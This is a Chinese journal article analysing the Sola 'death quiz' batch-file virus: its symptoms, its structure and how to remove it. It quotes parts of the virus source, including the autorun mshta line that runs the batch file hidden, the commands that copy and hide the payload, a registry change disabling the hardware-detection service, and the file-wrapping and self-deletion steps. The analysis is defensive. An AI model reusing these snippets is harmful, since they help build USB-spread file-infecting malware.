浅析Sola病毒结构

摘要： Sola病毒是一种以批处理文件为主要运行体的病毒。其技术含量并不算高，但对用户数据文件所造成的影响较大。其主要特征是感染doc、txt、exe和jpg四类文件，将其变为exe文件。本文针对Sola病毒的特征、结构做了简单分析，并归纳了Sola病毒的处理方法。

Abstract： Sola virus is a kind of batch virus which mainly runs by bat files. It hasn't high technical content， but makes great impact on the user data files. Its main feature is infecting with four types of files in doc， txt， exe and jpg， turns them into exe files. Author made a simple analysis of the characteristics and structure of the virus in Sola， and summarized the approach of Sola virus.

关键词： Sola；病毒；结构

Key words： Sola；Virus；Structure

中图分类号：TP30 文献标识码：A 文章编号：1006-4311（2012）30-0215-02

0 引言

Sola病毒又名“死亡问答”宅男病毒，是一款由批处理文件运行的病毒，技术含量不很高，威力也不算强大，但对用户文件造成的影响较大，至今仍然可以见到被Sola病毒感染入侵的案例。由于是批处理病毒，源代码容易获取，所采用的隐藏手段也容易被破解，所以对于那些对病毒原理感兴趣，同时又没有专业工具的人来说是有一定研究价值的素材。

1 Sola病毒特征

Sola病毒有变种，本文针对较有代表性的版本做简单分析。

Sola病毒感染用户近期打开的doc、txt、exe和jpg四类文件，将其全部变成exe文件，如图1所示。在进程管理器里还能看到一个“sleep.exe”进程，而且非常活跃。当病毒执行次数累计超过50次的时候，死亡问答便会被激活（如图2所示），同时锁定系统，删除NTLDR文件。NTLDR是一个隐藏、只读属性的系统文件，它是Win NT/Win 2000/Win XP的引导文件，用来装载操作系统。当此文件丢失时就不能正确进入系统。如果用户回答问题正确，病毒恢复NTLDR，并且进入自我清除模式。如果用户回答失败，则需要重装系统。

中了Sola病毒以后普遍存在的明显特征体现在以下几个方面：

①每个本地盘的根目录会建立一个SOLA隐藏目录和一个Autorun.inf隐藏文件，如图3所示。

②从SOLA文件夹中可以找到Sola病毒的两个主要文件Function.dll和SOLA.bat，如图4所示。

③四类文件被感染变成exe文件。

此外，在“C：＼Documents and Settings＼All Users＼「开始菜单＼程序＼启动”中会有一个SOLA.vbs文件；c：＼windows＼system32＼文件夹下有rar.exe和sleep.exe两个病毒文件；C：＼WINDOWS＼Fonts＼HIDESELF...文件夹中还会包括一个Solasetup文件夹，这是病毒主目录。

2 Sola病毒结构

Sola病毒功能比较多，下面只对其中主要功能结构进行简单分析。

2.1 自动播放文件 Sola病毒生成的Autorun.Inf文件共计9行代码，部分代码如下：

shell＼打开（&O）＼command=mshta "javascript：new ActiveXObject（'WScript. Shell'）.Run（'SOLA＼＼SOLA.BAT -USB'，0）； window.close（ ）"

从中可以看出，自动播放文件通过系统VBS来调用SOLA.bat文件。所以SOLA.bat文件是一个入口文件。

2.2 SOLA.bat文件 SOLA.bat文件包含232行代码，感染病毒时包含255行代码。主要包括安装、运行、测试、恶意程序启用、自删除修复等几方面的动作。

2.2.1 初始动作 下面是拷贝病毒主要文件的部分代码，从中可以看出病毒入侵的主要位置。

if not "%1"=="-USB" type %selfname%>%systemroot%＼ Fonts＼ HIDESE～1＼ sola.bat

if "%1"=="-USB" type sola.bat>%systemroot%＼Fonts＼HIDESE～1＼sola.bat

type Function.dll>%systemroot%＼Fonts＼HIDESE～1＼Function.exe

echo set ws=wscript.createobject（"wscript.shell"）>>%systemroot%＼ Fonts＼ HIDESE～1＼SOLA.VBS

echo>%systemroot%＼Fonts＼HIDESE～1＼sola.sign

病毒会感染用户近期打开过的（doc、txt、exe、jpg）文件，使之全部变成EXE文件。

copy %setup%＼Function.dll %Sola%＼Function.dll

attrib %Sola%＼Function.dll +s +h +r

rar -m0 -ep -ep1 a %setup%＼docpack.dll %Sola%＼Function.dll

rar -m0 -ep -ep1 a %setup%＼txtpack.dll %Sola%＼Function.dll

rar -m0 -ep -ep1 a %setup%＼exepack.dll %Sola%＼Function.dll

rar -m0 -ep -ep1 a %setup%＼jpgpack.dll %Sola%＼Function.dll

del Function.exe

从上边的代码可以看出四类文件会被感染，病毒感染文件后和Function.dll整合，然后自我删除Function.exe。

rar是WinRar的DOS命令文件，从中可以看出Function.dll其实不是动态链接库，而是一个压缩包。用WinRar打开可以看到解压的结果，如图5所示。

下面是安装sleep病毒文件、Regedit，并且修改注册表里的内容。其中A0001=copy，A0003=echo。

%A0001% %setup%＼sleep.exe %systemroot%＼system32＼sleep.exe

%A0003% Windows Registry Editor Version 5.00>%systemroot%＼ Fonts＼ HIDESE～1＼ Regedit.reg

%A0003% [HKEY_LOCAL_MACHINE＼SYSTEM＼Current

ControlSet＼Services＼ShellHWDetection]>>%systemroot%＼Fonts＼

HIDESE～1＼Regedit.reg

%A0003% “Start”=dword：00000004>> %systemroot%＼Fonts＼ HIDESE～1＼ Regedit.reg

regedit /s %systemroot%＼Fonts＼HIDESE～1＼Regedit.reg

2.2.2 运行主要破坏动作 当四类文件被感染时，Sola.bat会生成如下代码（以doc文件为例，假设被感染的文件名为“实验.doc”）。

……

FOR /F "delims=：" %%i in （'findstr "%Code%" *.exe'） do set PackName=%%i

rar -m0 -ep -ep1 a "%PackName%" "%Name%"

echo %Code%>>"%PackName%"

……

attrib Function.dll -s -h -r

del Function.dll

attrib %0 -s -h -r

del %0

……

set Code=SOLA_2.0_200912452310162

set Name=实验.doc

可以看到恶意程序启用、自删除等一系列动作。

2.3 Function.dll压缩包 Function.dll压缩包中有19个文件，包含了Sola病毒之所以称为“死亡问答”病毒的主要动作文件。

Autorun.inf、SOLA.BAT是病毒文件的副本，用于复制；docpack.dll、exepack.dll、jpgpack.dll、txtpack.dll四个文件是感染4类文件的功能文件；Rar.exe是Winrar的DOS命令文件，病毒中自带是为了方便完成各种解压操作；infect.bat、LocalScan.bat、readlnk.bat、RecentInf.bat、scan.bat均是SOLA文件需要调用的功能模块，同时完成病毒包括驻留内存、添加启动项、系统中留后门、感染4类文件、检测可移动设备等功能；TENBATSU.BAT是生成“死亡问答”所有文字提示和问题界面等内容的文件，从中还可以见到病毒制作者留下的信息；KillVirus.TXT里边是病毒制作者（KAKENHI）提供的说明提示性文字，包括提示该病毒中自带专杀工具；SolaKiller.rar是病毒作者提供的专杀工具。

3 Sola病毒解决方案

如果被感染的文件数量不大，可以尝试手动恢复。将被感染文件后缀改为rar，双击打开，可以看到被隐藏起来的原始文件，解压原始文件，用attrib去除隐藏系统属性就能恢复。

如果想清除病毒，最简单的办法是利用病毒作者提供的Sola病毒专杀工具SolaKiller.rar来处理病毒，该压缩包的解压密码是kakenhi200601。

由于Sola病毒威力不大，很多数据安全问题相关人士在网上自己的Sola病毒专杀工具，大多数都能出色完成病毒清除工作。卡巴斯基、360、瑞星、金山等品牌厂商也纷纷推出专业的专杀工具进行有效防范。因此，能够预见Sola病毒是一种可以被有效控制的病毒。

4 结束语

防范Sola病毒的主要途径就是控制移动存储工具的使用。从Sola病毒整个的结构和运行方式来看（特别是死亡问答界面中的文字信息）我们看到更多的是作者的情绪。这恰恰才是需要引起我们思考的地方。

参考文献：

[1]璐绥.遭遇SOLA病毒——分析和解决方案.http：//.cn/lusay.2009-07-12.

[2]谭柳斌.计算机病毒的正确防御探讨.电脑知识与技术，2011，（20）.

[3]杨明明，孔靓.计算机病毒及防范措施简介.电脑学习，2010，（01）.